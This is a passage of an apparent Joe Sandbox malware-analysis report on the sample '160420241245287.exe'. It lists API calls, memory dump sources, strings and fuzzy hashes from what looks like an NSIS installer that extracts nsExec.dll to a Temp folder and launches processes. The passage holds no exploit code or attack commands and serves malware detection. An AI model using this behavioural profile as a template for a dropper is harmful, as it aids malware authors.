                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                        • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                                                                        • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                                                                        • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetCommandLineW.KERNEL32(00000400), ref: 10001998
                                                                        • lstrcpynW.KERNEL32(?,00000000), ref: 100019A6
                                                                        • CharNextW.USER32(00000022), ref: 100019D3
                                                                        • CharNextW.USER32(00000022), ref: 100019DE
                                                                        • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 10001A03
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10001A15
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 10001A22
                                                                        • CloseHandle.KERNEL32(?), ref: 10001A31
                                                                        • CloseHandle.KERNEL32(?), ref: 10001A36
                                                                        • ExitProcess.KERNEL32 ref: 10001A3B
                                                                        • ExitProcess.KERNEL32 ref: 10001A46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1651374950.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000000.00000002.1651352139.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651814942.0000000010002000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651860547.0000000010003000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651876338.0000000010004000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_10000000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Exit$CharCloseHandleNext$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                                        • String ID: "$D
                                                                        • API String ID: 3771911414-1154559923
                                                                        • Opcode ID: 792074d24ee166c0d63ae550d6059b886baf2d36a3c8092926d8f070f9b5f0bf
                                                                        • Instruction ID: 9e44c51dddde78ff0986a5ea86513d283f9c8b06d9e3fbca70b926d3284a145a
                                                                        • Opcode Fuzzy Hash: 792074d24ee166c0d63ae550d6059b886baf2d36a3c8092926d8f070f9b5f0bf
                                                                        • Instruction Fuzzy Hash: FB214F7180025DFAFB10DBD0CD98AEFBBBDEB04385F504026E206B60A5DB701E85DBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061E1
                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                        • CharNextW.USER32(?,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061F5
                                                                        • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 00406208
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: "C:\Users\user\Desktop\160420241245287.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 589700163-3193094500
                                                                        • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                        • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                        • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                        • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                        • GetSysColor.USER32(00000000), ref: 004041CF
                                                                        • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                        • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                        • GetSysColor.USER32(?), ref: 004041FA
                                                                        • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                        • DeleteObject.GDI32(?), ref: 00404224
                                                                        • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                        • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                        • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                        • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                          • Part of subcall function 00405BD9: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                          • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                        • String ID: 9
                                                                        • API String ID: 1149667376-2366072709
                                                                        • Opcode ID: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                        • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                        • Opcode Fuzzy Hash: e497fc0f6c600e964b9f2122c9ab3848d05cefc5a36f71c7b66b32dfb87a2e9e
                                                                        • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                        • String ID:
                                                                        • API String ID: 3294113728-0
                                                                        • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                        • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                        • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                        • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040252F
                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,?,?,0040A580,000000FF,C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402536
                                                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharFileMultiWideWritelstrlen
                                                                        • String ID: 8$C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll
                                                                        • API String ID: 1453599865-4020093364
                                                                        • Opcode ID: c7447fd0e8749cdca90a2cba000cd85fe66b600f003a372b8c9c209f1f138d24
                                                                        • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                        • Opcode Fuzzy Hash: c7447fd0e8749cdca90a2cba000cd85fe66b600f003a372b8c9c209f1f138d24
                                                                        • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                        • GetTickCount.KERNEL32 ref: 00402D53
                                                                        • wsprintfW.USER32 ref: 00402D81
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                          • Part of subcall function 00405194: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00402D94), ref: 004051EF
                                                                          • Part of subcall function 00405194: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll), ref: 00405201
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                          • Part of subcall function 00402CFE: MulDiv.KERNEL32(00000000,00000064,00000AD7), ref: 00402D13
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                        • String ID: ... %d%%
                                                                        • API String ID: 722711167-2449383134
                                                                        • Opcode ID: 10ed1b886f90255ba0200a3e5e3570a2ad22fff5ddacabc684ec88c3e3d10c3d
                                                                        • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                        • Opcode Fuzzy Hash: 10ed1b886f90255ba0200a3e5e3570a2ad22fff5ddacabc684ec88c3e3d10c3d
                                                                        • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                        • GetMessagePos.USER32 ref: 00404A81
                                                                        • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                        • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                        • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                        • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401D44
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                        • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID: Calibri
                                                                        • API String ID: 3808545654-1409258342
                                                                        • Opcode ID: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                        • Instruction ID: 3b80acf522b7bf2f021413e8febbbf72b8f641a50adb0d53ac9f1aa9edf06097
                                                                        • Opcode Fuzzy Hash: 2e0cf1ae7789b1e5f567ac3b49d0821904878b54da257bbf53db2f94e685cd66
                                                                        • Instruction Fuzzy Hash: DF01D131948280AFEB016BB0AE0BB9ABF74DF95301F144479F245B62E2C77914049F7E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                        • wsprintfW.USER32 ref: 00402CD1
                                                                        • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                        • API String ID: 1451636040-1158693248
                                                                        • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                        • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                        • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                        • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,1000113F), ref: 100010A5
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 100010AC
                                                                        • GetCurrentProcess.KERNEL32(?,?,0000003F,?,1000113F), ref: 100010BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1651374950.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000000.00000002.1651352139.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651814942.0000000010002000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651860547.0000000010003000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651876338.0000000010004000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_10000000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: AddressCurrentHandleModuleProcProcess
                                                                        • String ID: IsWow64Process$kernel32
                                                                        • API String ID: 4190356694-3789238822
                                                                        • Opcode ID: c92513acdc9b6eec232b65c07616bbc12a548fba582b79c45e34bb9a570c82f0
                                                                        • Instruction ID: 3ef6a93ad146ebeaf0d17e4587e90b9f2b778901b0e47637b23e27d0b58942e2
                                                                        • Opcode Fuzzy Hash: c92513acdc9b6eec232b65c07616bbc12a548fba582b79c45e34bb9a570c82f0
                                                                        • Instruction Fuzzy Hash: F3E04672905228ABFA10D7E18C4CA8F3BACEB042C1B000511FA01D310DEAA0DA009AA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,100012F4,00000000,/TIMEOUT=,00000000), ref: 10001872
                                                                        • lstrlenW.KERNEL32(?,?,?,100012F4,00000000,/TIMEOUT=,00000000), ref: 1000187D
                                                                        • lstrcmpiW.KERNEL32(?,?,?,?,100012F4,00000000,/TIMEOUT=,00000000), ref: 1000189B
                                                                        • CharNextW.USER32(?,?,?,100012F4,00000000,/TIMEOUT=,00000000), ref: 100018AD
                                                                        • lstrlenW.KERNEL32(00000000,?,?,100012F4,00000000,/TIMEOUT=,00000000), ref: 100018B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1651374950.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000000.00000002.1651352139.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651814942.0000000010002000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651860547.0000000010003000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000000.00000002.1651876338.0000000010004000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_10000000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: 65246361145c8fe2793ea78b56644e20d2b7f67d4f52c02e1ae136f7ea0f5d06
                                                                        • Instruction ID: ea7230b3b9df2a54ae5240d03a55c1906f1ad71b73b81b4e1125b9fc16b230e8
                                                                        • Opcode Fuzzy Hash: 65246361145c8fe2793ea78b56644e20d2b7f67d4f52c02e1ae136f7ea0f5d06
                                                                        • Instruction Fuzzy Hash: 89016D31200628BFEB11DFA4CC809DE77A8EF452D07618069FD04D7216EB70DA41DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                        • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                        • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
